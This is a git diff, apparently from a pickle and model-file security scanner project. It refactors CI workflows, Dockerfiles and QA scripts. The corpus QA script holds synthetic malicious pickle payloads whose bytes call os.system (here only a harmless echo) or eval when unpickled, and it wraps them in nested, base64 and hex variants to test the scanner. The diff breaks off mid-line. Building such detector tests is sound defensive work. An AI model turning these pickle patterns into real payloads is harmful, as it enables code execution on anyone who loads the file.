astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin 3.12 + - *pin-python-312 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - - name: Cache Python dependencies - uses: actions/cache@caa296126883cff596d87d8935842f9db880ef25 # v5 - with: - path: | - .venv - ~/.cache/pip - ~/.cache/uv - key: ${{ runner.os }}-uv-py3.12-${{ hashFiles('**/uv.lock', '**/pyproject.toml') }} - restore-keys: | - ${{ runner.os }}-uv-py3.12- - ${{ runner.os }}-uv- + - *cache-python-312-dependencies - - name: Sync dependencies - run: | - uv sync --extra all-ci + - *sync-all-ci-dependencies - name: Run branch coverage shard run: | @@ -615,30 +527,18 @@ jobs: # Reduced matrix for PRs, full matrix for main and merge_group runs include: ${{ github.event_name == 'pull_request' && fromJSON('[{"python-version":"3.10","numpy-mode":"1.x"},{"python-version":"3.11","numpy-mode":"2.x"},{"python-version":"3.12","numpy-mode":"2.x"}]') || fromJSON('[{"python-version":"3.10","numpy-mode":"1.x"},{"python-version":"3.11","numpy-mode":"2.x"},{"python-version":"3.12","numpy-mode":"2.x"},{"python-version":"3.13","numpy-mode":"2.x"}]') }} steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin ${{ matrix.python-version }} + - *pin-matrix-python - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - name: Cache Python dependencies uses: actions/cache@caa296126883cff596d87d8935842f9db880ef25 # v5 with: - path: | - .venv - ~/.cache/pip - ~/.cache/uv + path: *python-cache-paths key: ${{ runner.os }}-uv-py${{ matrix.python-version }}-numpy${{ matrix.numpy-mode }}-${{ hashFiles('**/uv.lock', '**/pyproject.toml') }} restore-keys: | ${{ runner.os }}-uv-py${{ matrix.python-version }}-numpy${{ matrix.numpy-mode }}- @@ -696,22 +596,13 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 10 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin 3.12 + - *pin-python-312 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - name: Install WITHOUT TensorFlow run: | @@ -757,8 +648,7 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 15 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - name: Install protoc 33.5 run: | @@ -820,22 +710,13 @@ jobs: sevenzip, ] steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin 3.12 + - *pin-python-312 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - name: Install with ${{ matrix.extra }} extra run: | @@ -861,38 +742,17 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 20 steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin 3.12 + - *pin-python-312 - - name: Install Rust toolchain - run: | - rustup toolchain install stable --profile minimal - rustup default stable + - *install-rust-toolchain - - name: Cache Python dependencies - uses: actions/cache@caa296126883cff596d87d8935842f9db880ef25 # v5 - with: - path: | - .venv - ~/.cache/pip - ~/.cache/uv - key: ${{ runner.os }}-uv-py3.12-${{ hashFiles('**/uv.lock', '**/pyproject.toml') }} - restore-keys: | - ${{ runner.os }}-uv-py3.12- - ${{ runner.os }}-uv- + - *cache-python-312-dependencies - - name: Sync dependencies - run: | - uv sync --extra all-ci + - *sync-all-ci-dependencies - name: Build standalone pickle package run: | @@ -952,17 +812,11 @@ jobs: run: working-directory: packages/modelaudit-picklescan steps: - - name: Checkout repo - uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6 + - *checkout-repo - - name: Install uv - uses: astral-sh/setup-uv@37802adc94f370d6bfd71619e3f0bf239e1f3b78 # v7 - with: - enable-cache: true + - *install-uv - - name: Pin Python version - run: | - uv python pin ${{ matrix.python-version }} + - *pin-matrix-python - name: Install Rust toolchain run: | @@ -982,8 +836,7 @@ jobs: ${{ runner.os }}-cargo-picklescan- - name: Check standalone package lock is in sync - run: | - uv lock --check + run: *check-uv-lock - name: Check Rust scanner formatting run: | @@ -995,7 +848,6 @@ jobs: - name: Check Rust scanner MSRV run: | - rustup toolchain install 1.83.0 --profile minimal cargo +1.83.0 check --manifest-path Cargo.toml --locked - name: Lint Rust scanner crate @@ -1010,10 +862,6 @@ jobs: run: | uv run --with 'ruff==0.16.9' ruff check src tests - - name: Check standalone package import organization with Ruff - run: | - uv run --with 'ruff==0.16.9' ruff check --select I src tests - - name: Check standalone package formatting with Ruff run: | uv run --with 'ruff==0.16.9' ruff format --check src tests diff --git a/Dockerfile b/Dockerfile index f13e40fa6..618f914f1 100644 --- a/Dockerfile +++ b/Dockerfile @@ -17,23 +17,12 @@ WORKDIR /build COPY pyproject.toml README.md ./ COPY packages/modelaudit-picklescan ./packages/modelaudit-picklescan COPY modelaudit ./modelaudit +COPY docker-install-rust.sh ./ RUN apt-get update \ && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 libcap2 libssl3t64 libsystemd0 libudev1 \ && apt-get install --yes --no-install-recommends build-essential ca-certificates curl \ - && case "${TARGETARCH:=$(dpkg --print-architecture)}" in \ - amd64) rustup_target="x86_64-unknown-linux-gnu"; rustup_sha256="${RUSTUP_INIT_X86_64_UNKNOWN_LINUX_GNU_SHA256}" ;; \ - arm64) rustup_target="aarch64-unknown-linux-gnu"; rustup_sha256="${RUSTUP_INIT_AARCH64_UNKNOWN_LINUX_GNU_SHA256}" ;; \ - *) echo "Unsupported Docker build architecture: ${TARGETARCH}" >&2; exit 1 ;; \ - esac \ - && curl --proto '=https' --tlsv1.2 -fsSL \ - "https://static.rust-lang.org/rustup/archive/${RUSTUP_VERSION}/${rustup_target}/rustup-init" \ - -o /tmp/rustup-init \ - && printf '%s %s\n' "${rustup_sha256}" /tmp/rustup-init > /tmp/rustup-init.sha256 \ - && sha256sum -c /tmp/rustup-init.sha256 \ - && chmod +x /tmp/rustup-init \ - && /tmp/rustup-init -y --profile minimal --default-toolchain "${PICKLESCAN_RUST_TOOLCHAIN}" \ - && rm -f /tmp/rustup-init /tmp/rustup-init.sha256 \ + && . ./docker-install-rust.sh \ && PATH="/root/.cargo/bin:${PATH}" pip wheel --no-cache-dir --wheel-dir /wheels \ ./packages/modelaudit-picklescan \ . \ diff --git a/Dockerfile.full b/Dockerfile.full index c00c5f36c..7b76390c0 100644 --- a/Dockerfile.full +++ b/Dockerfile.full @@ -19,19 +19,7 @@ COPY . . RUN apt-get update \ && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 libcap2 libssl3t64 libsystemd0 libudev1 \ && apt-get install --yes --no-install-recommends build-essential ca-certificates curl \ - && case "${TARGETARCH:=$(dpkg --print-architecture)}" in \ - amd64) rustup_target="x86_64-unknown-linux-gnu"; rustup_sha256="${RUSTUP_INIT_X86_64_UNKNOWN_LINUX_GNU_SHA256}" ;; \ - arm64) rustup_target="aarch64-unknown-linux-gnu"; rustup_sha256="${RUSTUP_INIT_AARCH64_UNKNOWN_LINUX_GNU_SHA256}" ;; \ - *) echo "Unsupported Docker build architecture: ${TARGETARCH}" >&2; exit 1 ;; \ - esac \ - && curl --proto '=https' --tlsv1.2 -fsSL \ - "https://static.rust-lang.org/rustup/archive/${RUSTUP_VERSION}/${rustup_target}/rustup-init" \ - -o /tmp/rustup-init \ - && printf '%s %s\n' "${rustup_sha256}" /tmp/rustup-init > /tmp/rustup-init.sha256 \ - && sha256sum -c /tmp/rustup-init.sha256 \ - && chmod +x /tmp/rustup-init \ - && /tmp/rustup-init -y --profile minimal --default-toolchain "${PICKLESCAN_RUST_TOOLCHAIN}" \ - && rm -f /tmp/rustup-init /tmp/rustup-init.sha256 \ + && . ./docker-install-rust.sh \ && PATH="/root/.cargo/bin:${PATH}" pip wheel --no-cache-dir --wheel-dir /wheels \ ./packages/modelaudit-picklescan \ . \ diff --git a/Dockerfile.tensorflow b/Dockerfile.tensorflow index 2678cb926..f61f8bc25 100644 --- a/Dockerfile.tensorflow +++ b/Dockerfile.tensorflow @@ -18,22 +18,11 @@ COPY pyproject.toml README.md ./ COPY requirements-tensorflow.txt ./ COPY packages/modelaudit-picklescan ./packages/modelaudit-picklescan COPY modelaudit ./modelaudit +COPY docker-install-rust.sh ./ RUN apt-get update \ && apt-get install --yes --no-install-recommends build-essential ca-certificates curl \ - && case "${TARGETARCH:=$(dpkg --print-architecture)}" in \ - amd64) rustup_target="x86_64-unknown-linux-gnu"; rustup_sha256="${RUSTUP_INIT_X86_64_UNKNOWN_LINUX_GNU_SHA256}" ;; \ - arm64) rustup_target="aarch64-unknown-linux-gnu"; rustup_sha256="${RUSTUP_INIT_AARCH64_UNKNOWN_LINUX_GNU_SHA256}" ;; \ - *) echo "Unsupported Docker build architecture: ${TARGETARCH}" >&2; exit 1 ;; \ - esac \ - && curl --proto '=https' --tlsv1.2 -fsSL \ - "https://static.rust-lang.org/rustup/archive/${RUSTUP_VERSION}/${rustup_target}/rustup-init" \ - -o /tmp/rustup-init \ - && printf '%s %s\n' "${rustup_sha256}" /tmp/rustup-init > /tmp/rustup-init.sha256 \ - && sha256sum -c /tmp/rustup-init.sha256 \ - && chmod +x /tmp/rustup-init \ - && /tmp/rustup-init -y --profile minimal --default-toolchain "${PICKLESCAN_RUST_TOOLCHAIN}" \ - && rm -f /tmp/rustup-init /tmp/rustup-init.sha256 \ + && . ./docker-install-rust.sh \ && PATH="/root/.cargo/bin:${PATH}" pip wheel --no-cache-dir --no-deps --wheel-dir /wheels \ ./packages/modelaudit-picklescan \ && pip install --no-cache-dir --prefix=/install -c requirements-tensorflow.txt \ diff --git a/docker-compose.yml b/docker-compose.yml index 8a8e8eebd..6cf2248e5 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -3,7 +3,7 @@ version: "3" services: modelaudit-base: build: . - volumes: + volumes: &model-volume - ./models:/models command: scan --help @@ -11,14 +11,12 @@ services: build: context: . dockerfile: Dockerfile.tensorflow - volumes: - - ./models:/models + volumes: *model-volume command: scan --help modelaudit-full: build: context: . dockerfile: Dockerfile.full - volumes: - - ./models:/models + volumes: *model-volume command: scan --help diff --git a/docker-entrypoint.sh b/docker-entrypoint.sh index 772de5602..fb0e70584 100644 --- a/docker-entrypoint.sh +++ b/docker-entrypoint.sh @@ -21,10 +21,5 @@ if [[ "$1" == "-c" ]] || [[ "$1" == "-m" ]]; then exec python "$@" fi -# If no arguments or first argument looks like a modelaudit option, run modelaudit -if [[ $# -eq 0 ]] || [[ "$1" == "--"* ]] || [[ "$1" == "-"* ]] || [[ "$1" == "scan" ]]; then - exec modelaudit "$@" -fi - -# For file paths or other arguments, assume it's a scan command +# Run ModelAudit for every other invocation. exec modelaudit "$@" \ No newline at end of file diff --git a/docker-install-rust.sh b/docker-install-rust.sh new file mode 100644 index 000000000..d83495031 --- /dev/null +++ b/docker-install-rust.sh @@ -0,0 +1,16 @@ +#!/bin/sh +# Sourced by builder stages to preserve TARGETARCH fallback assignment. + +case "${TARGETARCH:=$(dpkg --print-architecture)}" in \ + amd64) rustup_target="x86_64-unknown-linux-gnu"; rustup_sha256="${RUSTUP_INIT_X86_64_UNKNOWN_LINUX_GNU_SHA256}" ;; \ + arm64) rustup_target="aarch64-unknown-linux-gnu"; rustup_sha256="${RUSTUP_INIT_AARCH64_UNKNOWN_LINUX_GNU_SHA256}" ;; \ + *) echo "Unsupported Docker build architecture: ${TARGETARCH}" >&2; exit 1 ;; \ +esac \ +&& curl --proto '=https' --tlsv1.2 -fsSL \ + "https://static.rust-lang.org/rustup/archive/${RUSTUP_VERSION}/${rustup_target}/rustup-init" \ + -o /tmp/rustup-init \ +&& printf '%s %s\n' "${rustup_sha256}" /tmp/rustup-init > /tmp/rustup-init.sha256 \ +&& sha256sum -c /tmp/rustup-init.sha256 \ +&& chmod +x /tmp/rustup-init \ +&& /tmp/rustup-init -y --profile minimal --default-toolchain "${PICKLESCAN_RUST_TOOLCHAIN}" \ +&& rm -f /tmp/rustup-init /tmp/rustup-init.sha256 diff --git a/pyproject.toml b/pyproject.toml index d81ace34b..1191c4245 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -354,11 +354,6 @@ module = "modelaudit.scanners.*" # Scanners use dynamic patterns that need Any warn_return_any = false -[[tool.mypy.overrides]] -module = "modelaudit.suspicious_symbols" -# Runtime validation needs to check types even with annotations -warn_unreachable = false - [[tool.mypy.overrides]] module = "modelaudit.scanners.oci_layer_scanner" # Runtime validation needs to check types even with annotations diff --git a/scripts/benchmark_report.py b/scripts/benchmark_report.py index 2a6492446..de5da141f 100644 --- a/scripts/benchmark_report.py +++ b/scripts/benchmark_report.py @@ -114,10 +114,6 @@ def _merged_record_context( return workload, target, size, files -def _format_change(delta_ratio: float) -> str: - return f"{delta_ratio:+.1%}" - - def _build_summary( current: dict[str, BenchmarkRecord], baseline: dict[str, BenchmarkRecord] | None, @@ -216,7 +212,7 @@ def _build_summary( total_delta_ratio = 0.0 if baseline_total == 0 else (current_total - baseline_total) / baseline_total lines.append( f"Aggregate shared-benchmark median: {_format_duration(baseline_total)} " - f"-> {_format_duration(current_total)} ({_format_change(total_delta_ratio)})." + f"-> {_format_duration(current_total)} ({f'{total_delta_ratio:+.1%}'})." ) top_regressions = [row for row in sorted_rows if row.status == "regression"][:3] @@ -225,7 +221,7 @@ def _build_summary( lines.append("Top regressions:") for row in top_regressions: lines.append( - f"- `{row.name}` {_format_change(row.delta_ratio)} " + f"- `{row.name}` {f'{row.delta_ratio:+.1%}'} " f"({_format_duration(row.baseline_median)} -> {_format_duration(row.current_median)}, " f"{row.workload}, {row.target}, size={row.size}, files={row.files})" ) @@ -236,7 +232,7 @@ def _build_summary( lines.append("Top improvements:") for row in top_improvements: lines.append( - f"- `{row.name}` {_format_change(row.delta_ratio)} " + f"- `{row.name}` {f'{row.delta_ratio:+.1%}'} " f"({_format_duration(row.baseline_median)} -> {_format_duration(row.current_median)}, " f"{row.workload}, {row.target}, size={row.size}, files={row.files})" ) @@ -249,7 +245,7 @@ def _build_summary( lines.append( f"| `{row.workload}` | `{row.name}` | `{row.target}` | {row.size} | {row.files} | " f"{_format_duration(row.baseline_median)} | {_format_duration(row.current_median)} | " - f"{_format_change(row.delta_ratio)} | {row.status} |" + f"{f'{row.delta_ratio:+.1%}'} | {row.status} |" ) if new_in_current: diff --git a/scripts/compile_tensorflow_protos.sh b/scripts/compile_tensorflow_protos.sh index 40be0893b..ebf9fad7e 100755 --- a/scripts/compile_tensorflow_protos.sh +++ b/scripts/compile_tensorflow_protos.sh @@ -71,30 +71,19 @@ echo "Compiling protobuf files..." COMPILED=0 FAILED=0 -# Compile ALL proto files in the framework directory -echo " Compiling framework protos..." -for proto in tensorflow/core/framework/*.proto; do - if [[ -f "$proto" ]]; then - if protoc --python_out="$OUTPUT_DIR" -I. "$proto" 2>&1; then - COMPILED=$((COMPILED + 1)) - else - echo " WARNING: Failed to compile $proto" - FAILED=$((FAILED + 1)) +# Compile ALL proto files in the framework and protobuf directories. +for proto_group in framework protobuf; do + echo " Compiling $proto_group protos..." + for proto in tensorflow/core/"$proto_group"/*.proto; do + if [[ -f "$proto" ]]; then + if protoc --python_out="$OUTPUT_DIR" -I. "$proto" 2>&1; then + COMPILED=$((COMPILED + 1)) + else + echo " WARNING: Failed to compile $proto" + FAILED=$((FAILED + 1)) + fi fi - fi -done - -# Compile ALL proto files in the protobuf directory -echo " Compiling protobuf protos..." -for proto in tensorflow/core/protobuf/*.proto; do - if [[ -f "$proto" ]]; then - if protoc --python_out="$OUTPUT_DIR" -I. "$proto" 2>&1; then - COMPILED=$((COMPILED + 1)) - else - echo " WARNING: Failed to compile $proto" - FAILED=$((FAILED + 1)) - fi - fi + done done echo "" diff --git a/scripts/large_pickle_corpus_qa.py b/scripts/large_pickle_corpus_qa.py index 72598b60f..634dd5559 100644 --- a/scripts/large_pickle_corpus_qa.py +++ b/scripts/large_pickle_corpus_qa.py @@ -440,10 +440,6 @@ class NormalizedResult: } -def _now_iso() -> str: - return datetime.now(timezone.utc).isoformat().replace("+00:00", "Z") - - def _json_default(value: Any) -> Any: if isinstance(value, Path): return str(value) @@ -547,32 +543,12 @@ def _tool_path(spec: ToolSpec, tools_root: Path) -> Path: return tools_root / default_path -def _tool_dirty_status(path: Path) -> str: - return _repo_git(["status", "--short"], cwd=path).stdout.strip() - - -def _git_describe(path: Path) -> str: - return _repo_git(["describe", "--tags", "--always", "--dirty"], cwd=path).stdout.strip() - - -def _git_branch(path: Path) -> str: - return _repo_git(["branch", "--show-current"], cwd=path).stdout.strip() - - -def _git_remote(path: Path) -> str: - return _repo_git(["remote", "get-url", "origin"], cwd=path).stdout.strip() - - -def _git_head(path: Path) -> str: - return _repo_git(["rev-parse", "HEAD"], cwd=path).stdout.strip() - - def _git_default_branch(path: Path) -> str: result = _repo_git(["symbolic-ref", "refs/remotes/origin/HEAD"], cwd=path, check=False) ref = result.stdout.strip() if ref.startswith("refs/remotes/origin/"): return ref.removeprefix("refs/remotes/origin/") - return _git_branch(path) or "main" + return _repo_git(["branch", "--show-current"], cwd=path).stdout.strip() or "main" def _sync_tool(spec: ToolSpec, *, tools_root: Path, allow_dirty: bool, skip_pull: bool) -> dict[str, Any]: @@ -583,18 +559,18 @@ def _sync_tool(spec: ToolSpec, *, tools_root: Path, allow_dirty: bool, skip_pull if not (path / ".git").exists(): raise ValueError(f"{path} exists but is not a Git repository") - remote = _git_remote(path) + remote = _repo_git(["remote", "get-url", "origin"], cwd=path).stdout.strip() if remote != spec.repo_url: raise ValueError(f"{spec.name} remote mismatch: expected {spec.repo_url}, got {remote}") - dirty = _tool_dirty_status(path) + dirty = _repo_git(["status", "--short"], cwd=path).stdout.strip() if dirty and not allow_dirty: raise ValueError(f"{spec.name} worktree is dirty:\n{dirty}") if not skip_pull: _repo_git(["fetch", "--tags", "origin"], cwd=path) default_branch = _git_default_branch(path) - current_branch = _git_branch(path) + current_branch = _repo_git(["branch", "--show-current"], cwd=path).stdout.strip() if not dirty and current_branch and current_branch != default_branch: _repo_git(["checkout", default_branch], cwd=path) _repo_git(["pull", "--ff-only"], cwd=path) @@ -603,12 +579,12 @@ def _sync_tool(spec: ToolSpec, *, tools_root: Path, allow_dirty: bool, skip_pull "name": spec.name, "path": str(path), "repo_url": spec.repo_url, - "remote": _git_remote(path), - "branch": _git_branch(path), - "commit": _git_head(path), - "describe": _git_describe(path), - "dirty": _tool_dirty_status(path), - "synced_at": _now_iso(), + "remote": _repo_git(["remote", "get-url", "origin"], cwd=path).stdout.strip(), + "branch": _repo_git(["branch", "--show-current"], cwd=path).stdout.strip(), + "commit": _repo_git(["rev-parse", "HEAD"], cwd=path).stdout.strip(), + "describe": _repo_git(["describe", "--tags", "--always", "--dirty"], cwd=path).stdout.strip(), + "dirty": _repo_git(["status", "--short"], cwd=path).stdout.strip(), + "synced_at": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"), } @@ -634,10 +610,6 @@ def _select_entries( return entries -def _entry_local_path(corpus_root: Path, entry: CorpusEntry) -> Path: - return corpus_root / "raw" / entry.id / entry.path - - def _validated_artifact_id(value: object) -> str: artifact_id = str(value) if ( @@ -675,26 +647,6 @@ def _contained_output_path(root: Path, *parts: str | Path) -> Path: return candidate -def _validated_lock_entry_path(entry: Mapping[str, Any]) -> tuple[str, Path]: - return _validated_artifact_id(entry["id"]), _validated_remote_path(entry["path"]) - - -def _entry_to_lock(entry: CorpusEntry, *, corpus_root: Path) -> dict[str, Any]: - return { - **asdict(entry), - "revision": "main", - "remote_size_bytes": None, - "sha256": None, - "etag": None, - "license": None, - "source_url": f"https://huggingface.co/{entry.repo_id}/tree/main", - "downloaded_at": None, - "local_path": str(_entry_local_path(corpus_root, entry)), - "preflight_status": "pending", - "preflight_error": None, - } - - def _hf_file_metadata(repo_id: str, filename: str, *, revision: str) -> dict[str, Any]: try: from huggingface_hub import HfApi @@ -739,10 +691,6 @@ def _load_lock_entries(lock_path: Path) -> list[dict[str, Any]]: LOCK_CORE_KEYS = {"schema_version", "created_at", "tier", "entry_count", "entries"} -def _lock_extra_metadata(payload: Mapping[str, Any]) -> dict[str, Any]: - return {str(key): value for key, value in payload.items() if key not in LOCK_CORE_KEYS} - - def _write_lock( lock_path: Path, entries: list[dict[str, Any]], @@ -752,7 +700,7 @@ def _write_lock( ) -> None: payload = { "schema_version": 1, - "created_at": _now_iso(), + "created_at": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"), "tier": tier, "entry_count": len(entries), "entries": entries, @@ -765,7 +713,7 @@ def _write_lock( def _finalize_downloaded_entry(entry: dict[str, Any], local_path: Path) -> dict[str, Any]: entry["local_path"] = str(local_path) entry["sha256"] = _sha256_file(local_path) - entry["downloaded_at"] = _now_iso() + entry["downloaded_at"] = datetime.now(timezone.utc).isoformat().replace("+00:00", "Z") entry["downloaded_size_bytes"] = local_path.stat().st_size return entry @@ -815,7 +763,7 @@ def _download_entry( direct_fallback: bool, direct_only: bool, ) -> dict[str, Any]: - artifact_id, relative_path = _validated_lock_entry_path(entry) + artifact_id, relative_path = (_validated_artifact_id(entry["id"]), _validated_remote_path(entry["path"])) try: from huggingface_hub import hf_hub_download @@ -895,24 +843,18 @@ def _legacy_verdict(result: ScanResult) -> str: return "unknown" -def _normalize_scan_result(result: ScanResult, *, engine: str) -> NormalizedResult: - return NormalizedResult( - engine=engine, - status=_legacy_status(result), - verdict=_legacy_verdict(result), - success=bool(result.success), - warning_count=sum(1 for issue in result.issues if issue.severity == IssueSeverity.WARNING), - critical_count=sum(1 for issue in result.issues if issue.severity == IssueSeverity.CRITICAL), - info_count=sum(1 for issue in result.issues if issue.severity == IssueSeverity.INFO), - rule_codes=tuple(sorted(issue.rule_code for issue in result.issues if issue.rule_code)), - messages=tuple(sorted(issue.message for issue in result.issues)), - metadata=_json_clean(dict(result.metadata)), - ) - - -def _normalize_package_report(report: PickleReport, *, engine: str) -> NormalizedResult: - return NormalizedResult( - engine=engine, +def _scan_package(path: Path, *, engine: str, artifact_id: str) -> dict[str, Any]: + if engine != "rust": + raise ValueError(f"unsupported picklescan engine after Rust migration: {engine}") + started = time.monotonic() + if artifact_id == "V10": + report = StandalonePickleScanner(options=ScanOptions(max_opcodes=1)).scan_file(path) + else: + report = package_scan_file(path) + duration = time.monotonic() - started + normalized_engine = f"package:{engine}" + normalized = NormalizedResult( + engine=normalized_engine, status=report.status.value, verdict=report.verdict.value, success=report.status == ScanStatus.COMPLETE @@ -924,18 +866,6 @@ def _normalize_package_report(report: PickleReport, *, engine: str) -> Normalize messages=tuple(sorted(finding.message for finding in report.findings)), metadata=_json_clean(dict(report.metadata)), ) - - -def _scan_package(path: Path, *, engine: str, artifact_id: str) -> dict[str, Any]: - if engine != "rust": - raise ValueError(f"unsupported picklescan engine after Rust migration: {engine}") - started = time.monotonic() - if artifact_id == "V10": - report = StandalonePickleScanner(options=ScanOptions(max_opcodes=1)).scan_file(path) - else: - report = package_scan_file(path) - duration = time.monotonic() - started - normalized = _normalize_package_report(report, engine=f"package:{engine}") return { "artifact_id": artifact_id, "scanner": "modelaudit-picklescan", @@ -960,7 +890,19 @@ def _scan_root(path: Path, *, engine: str, root_mode: str, artifact_id: str) -> else: raise ValueError(f"unsupported root mode: {root_mode}") duration = time.monotonic() - started - normalized = _normalize_scan_result(result, engine=f"root:{root_mode}:{engine}") + normalized_engine = f"root:{root_mode}:{engine}" + normalized = NormalizedResult( + engine=normalized_engine, + status=_legacy_status(result), + verdict=_legacy_verdict(result), + success=bool(result.success), + warning_count=sum(1 for issue in result.issues if issue.severity == IssueSeverity.WARNING), + critical_count=sum(1 for issue in result.issues if issue.severity == IssueSeverity.CRITICAL), + info_count=sum(1 for issue in result.issues if issue.severity == IssueSeverity.INFO), + rule_codes=tuple(sorted(issue.rule_code for issue in result.issues if issue.rule_code)), + messages=tuple(sorted(issue.message for issue in result.issues)), + metadata=_json_clean(dict(result.metadata)), + ) return { "artifact_id": artifact_id, "scanner": "modelaudit-root", @@ -979,13 +921,6 @@ def _stable_report_dict(report: PickleReport) -> dict[str, Any]: return cleaned -def _tool_command(spec: ToolSpec, *, tool_path: Path, artifact_path: Path, output_path: Path) -> list[str]: - return [ - part.format(path=str(tool_path), artifact=str(artifact_path), output=str(output_path)) - for part in spec.invocation - ] - - def _third_party_verdict(tool: str, exit_code: int, stdout: str, stderr: str, output_json: Path) -> str: combined = f"{stdout}\n{stderr}".lower() if "traceback (most recent call last)" in combined or "unhandled exception" in combined: @@ -1042,7 +977,9 @@ def _scan_third_party( tool_path = _tool_path(spec, tools_root) output_path = _contained_output_path(run_dir, "third-party-raw", artifact_id, f"{spec.name}.json") output_path.parent.mkdir(parents=True, exist_ok=True) - command = _tool_command(spec, tool_path=tool_path, artifact_path=path, output_path=output_path) + command = [ + part.format(path=str(tool_path), artifact=str(path), output=str(output_path)) for part in spec.invocation + ] try: completed, duration = _run_command(command, timeout_s=timeout_s) status = "complete" @@ -1066,7 +1003,9 @@ def _scan_third_party( "artifact_id": artifact_id, "tool": spec.name, "tool_path": str(tool_path), - "tool_commit": _git_head(tool_path) if (tool_path / ".git").exists() else None, + "tool_commit": _repo_git(["rev-parse", "HEAD"], cwd=tool_path).stdout.strip() + if (tool_path / ".git").exists() + else None, "command": command, "status": status, "verdict": _third_party_verdict(spec.name, exit_code, stdout, stderr, output_path), @@ -1116,14 +1055,6 @@ def _member_file_path(run_dir: Path, artifact_id: str, member_name: str, *, memb return _contained_output_path(run_dir, "members", artifact_id, safe_member_name) -def _malicious_reduce_payload() -> bytes: - return raw_os_system_reduce_payload() - - -def _stack_global_payload() -> bytes: - return raw_stack_global_eval_reduce_payload() - - def raw_os_system_reduce_payload() -> bytes: return b"\x80\x04cos\nsystem\n\x8c\x0cecho qa-noop\x85R." @@ -1134,8 +1065,8 @@ def raw_stack_global_eval_reduce_payload() -> bytes: def _write_synthetic_variants(output_dir: Path) -> list[dict[str, Any]]: output_dir.mkdir(parents=True, exist_ok=True) - malicious = _malicious_reduce_payload() - stack_global = _stack_global_payload() + malicious = raw_os_system_reduce_payload() + stack_global = raw_stack_global_eval_reduce_payload() nested = pickle.dumps({"outer": malicious}, protocol=4) base64_payload = __import__("base64").b64encode(malicious).decode("ascii") hex_payload = malicious.hex() @@ -1179,7 +1110,7 @@ def _write_synthetic_variants(output_dir: Path) -> list[dict[str, Any]]: "path": str(path), "size_bytes": path.stat().st_size, "sha256": _sha256_file(path), - "created_at": _now_iso(), + "created_at": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"), } ) @@ -1195,7 +1126,7 @@ def _write_synthetic_variants(output_dir: Path) -> list[dict[str, Any]]: "path": str(zip_variant), "size_bytes": zip_variant.stat().st_size, "sha256": _sha256_file(zip_variant), - "created_at": _now_iso(), + "created_at": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"), } ) @@ -1208,7 +1139,7 @@ def _write_synthetic_variants(output_dir: Path) -> list[dict[str, Any]]: "path": str(malformed), "size_bytes": malformed.stat().st_size, "sha256": _sha256_file(malformed), - "created_at": _now_iso(), + "created_at": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"), } ) _write_json(output_dir / "synthetic-manifest.json", {"entries": records}) @@ -1218,7 +1149,7 @@ def _write_synthetic_variants(output_dir: Path) -> list[dict[str, Any]]: def _environment_payload(*, tools: Sequence[dict[str, Any]] | None = None) -> dict[str, Any]: git_status = _repo_git(["status", "--short"], cwd=REPO_ROOT, check=False).stdout.strip() return { - "created_at": _now_iso(), + "created_at": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"), "repo_root": str(REPO_ROOT), "git_commit": _repo_git(["rev-parse", "HEAD"], cwd=REPO_ROOT, check=False).stdout.strip(), "git_branch": _repo_git(["branch", "--show-current"], cwd=REPO_ROOT, check=False).stdout.strip(), @@ -1277,7 +1208,19 @@ def cmd_preflight(args: argparse.Namespace) -> int: tier=args.tier, include_replacements=args.include_replacements, ): - record = _entry_to_lock(entry, corpus_root=corpus_root) + record = { + **asdict(entry), + "revision": "main", + "remote_size_bytes": None, + "sha256": None, + "etag": None, + "license": None, + "source_url": f"https://huggingface.co/{entry.repo_id}/tree/main", + "downloaded_at": None, + "local_path": str(corpus_root / "raw" / entry.id / entry.path), + "preflight_status": "pending", + "preflight_error": None, + } if not args.offline: try: record.update(_hf_file_metadata(entry.repo_id, entry.path, revision=args.revision)) @@ -1348,7 +1291,7 @@ def cmd_download(args: argparse.Namespace) -> int: updated.append(entry) continue try: - _validated_lock_entry_path(entry) + (_validated_artifact_id(entry["id"]), 